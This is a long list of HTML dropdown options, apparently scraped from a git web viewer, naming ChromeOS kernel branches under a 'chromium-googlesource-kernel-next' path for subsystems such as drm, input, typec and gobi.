-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-170614'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-170614</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-170626'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-170626</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-latest'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-latest</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-misc'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-misc</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-mmc'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-mmc</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-mtd'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-mtd</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-net'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-net</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-pci'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-pci</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-pm'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-pm</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-pstore'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-pstore</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-regulator'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-regulator</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-rockchip-base'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-rockchip-base</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-sched'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-sched</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-scsi'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-scsi</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-security'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-security</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-sysrq'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-sysrq</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-thermal'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-thermal</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-tpm'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-tpm</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-typec'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-typec</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-typec-google-170413'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-typec-google-170413</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-typec-google-170418'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-typec-google-170418</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-typec-google-170419'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-typec-google-170419</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-typec-google-170424'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-typec-google-170424</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-typec-google-170425'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-typec-google-170425</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-typec-google-170504'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-typec-google-170504</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-typec-google-170511'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-typec-google-170511</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-typec-google-170516'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-typec-google-170516</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-typec-google-170517'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-typec-google-170517</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-typec-tcpm-170516'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-typec-tcpm-170516</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-usb'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-usb</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-wireless'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-wireless</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-x86'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-x86</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-android-3.14'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-android-3.14</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-arm-common-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-arm-common-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-arm-mips-3.14'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-arm-mips-3.14</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-arm_platform+android-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-arm_platform+android-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-atmel_mxt_ts-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-atmel_mxt_ts-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-atmel_mxt_ts-3.14'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-atmel_mxt_ts-3.14</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-atmel_mxt_ts-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-atmel_mxt_ts-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-atmel_mxt_ts-3.18-old'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-atmel_mxt_ts-3.18-old</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-atmel_mxt_ts-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-atmel_mxt_ts-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-atmel_mxt_ts-3.8-rc7'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-atmel_mxt_ts-3.8-rc7</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-2.6.36'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-2.6.36</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-2.6.37'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-2.6.37</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-2.6.37-rc5'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-2.6.37-rc5</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-2.6.38'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-2.6.38</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.0'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.0</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.0-premove'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.0-premove</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.14'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.14</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.18-old'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.18-old</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.2'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.2</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.2-fixed'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.2-fixed</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.2-premove'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.2-premove</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.3'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.3</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.4'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.4</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.4-rc1'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.4-rc1</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.4-rc3'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.4-rc3</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.4-rc4'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.4-rc4</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.4-rc5'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.4-rc5</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.4-rc7'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.4-rc7</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.7-rc5'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.7-rc5</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.7-rc8'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.7-rc8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.8-rc3'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.8-rc3</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.8-rc7'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-3.8-rc7</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-4.4'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-4.4</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-mm-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-mm-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-mm-4.4'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-base-mm-4.4</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-bluetooth-3.14'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-bluetooth-3.14</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-bluetooth-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-bluetooth-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-bluetooth-4.4'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-bluetooth-4.4</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-braswell-dptf-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-braswell-dptf-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-braswell-dptf-3.18-old'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-braswell-dptf-3.18-old</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-braswell-i915-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-braswell-i915-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-braswell-i915-3.18-old'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-braswell-i915-3.18-old</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cdcdrivers-3.14'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cdcdrivers-3.14</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cdcdrivers-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cdcdrivers-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cdcdrivers-3.18-old'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cdcdrivers-3.18-old</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-charger_manager-3.4'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-charger_manager-3.4</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-chromeos-sysrq-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-chromeos-sysrq-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cpufreq-interactive-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cpufreq-interactive-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cpufreq-interactive-4.4'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cpufreq-interactive-4.4</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cpufreq_interactive-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cpufreq_interactive-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cpufreq_interactive-3.14'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cpufreq_interactive-3.14</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cpufreq_interactive-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cpufreq_interactive-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cpufreq_interactive-3.18-old'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cpufreq_interactive-3.18-old</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cpuidle-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cpuidle-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cpuquiet-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cpuquiet-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cros_ec-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cros_ec-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cros_ec-3.14'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cros_ec-3.14</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cros_ec-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cros_ec-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cros_ec-3.18-old'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cros_ec-3.18-old</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cros_ec-4.4'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cros_ec-4.4</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cyapa-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cyapa-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cyapa-3.14'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cyapa-3.14</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cyapa-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cyapa-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cyapa-3.18-old'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cyapa-3.18-old</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cyapa-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-cyapa-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-devfreq-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-devfreq-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-devfreq-4.4'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-devfreq-4.4</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-device-blacklist-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-device-blacklist-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-device-blacklist-4.4'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-device-blacklist-4.4</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-drm-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-drm-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-drm-3.14'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-drm-3.14</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-drm-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-drm-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-drm-3.18-old'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-drm-3.18-old</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-drm-3.4'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-drm-3.4</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-drm-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-drm-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-drm-4.4'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-drm-4.4</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-drm-intel-forklift-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-drm-intel-forklift-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-drm-intel-forklift-3.14'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-drm-intel-forklift-3.14</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-elan-3.14'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-elan-3.14</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-elan-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-elan-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-elan-3.18-old'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-elan-3.18-old</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-elan-i2c-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-elan-i2c-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-elan-i2c-3.18-old'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-elan-i2c-3.18-old</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-elan_i2c-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-elan_i2c-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-elants-i2c-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-elants-i2c-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-elants-i2c-3.18-old'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-elants-i2c-3.18-old</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-exynos-3.4'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-exynos-3.4</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-exynos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-exynos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-gobi-3.0'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-gobi-3.0</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-gobi-3.2'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-gobi-3.2</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-gobi-3.2-premove'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-gobi-3.2-premove</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-gobi-3.4'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-gobi-3.4</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-gobi-3.4-rc7'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-gobi-3.4-rc7</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-gobi-3.7-rc5'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-gobi-3.7-rc5</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-gobi-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-gobi-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-google-firmware-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-google-firmware-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-google-firmware-4.4'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-google-firmware-4.4</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-gpio-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-gpio-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-gpu-3.4'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-gpu-3.4</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-hid-logitech-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-hid-logitech-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-hid-logitech-3.14'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-hid-logitech-3.14</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-hid-rmi-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-hid-rmi-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-hid-rmi-3.18-old'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-hid-rmi-3.18-old</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-hid-rmi-4.4'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-hid-rmi-4.4</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-i2c-core-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-i2c-core-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-i2c-core-4.4'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-i2c-core-4.4</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-i2c-hid-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-i2c-hid-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-i2c-hid-4.4'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-i2c-hid-4.4</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-i2c-i915-3.8-rc7'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-i2c-i915-3.8-rc7</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-i2c_i915-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-i2c_i915-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-i2c_i915-3.14'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-i2c_i915-3.14</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-i2c_i915-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-i2c_i915-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-iio-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-iio-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-iio-4.4'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-iio-4.4</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-input-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-input-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-input-3.2'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-input-3.2</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-input-3.2-premove'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-input-3.2-premove</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-input-3.3'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-input-3.3</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-input-3.4'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-input-3.4</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-input-3.4-rc1'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-input-3.4-rc1</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-input-3.4-rc3'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-input-3.4-rc3</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-input-3.4-rc4'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-input-3.4-rc4</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-input-3.4-rc5'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-input-3.4-rc5</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-input-3.4-rc7'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-input-3.4-rc7</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-input-4.4'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-input-4.4</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-intel_i2c-3.4'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-intel_i2c-3.4</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-intel_i2c-3.4-rc7'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-intel_i2c-3.4-rc7</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-ipvlan-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-ipvlan-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-kasan-3.18'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-kasan-3.18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-keyboard-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-keyboard-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-keyboard-3.14'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-keyboard-3.14</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-keyboard-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-keyboard-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-keyboard-3.8-rc7'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-keyboard-3.8-rc7</option>
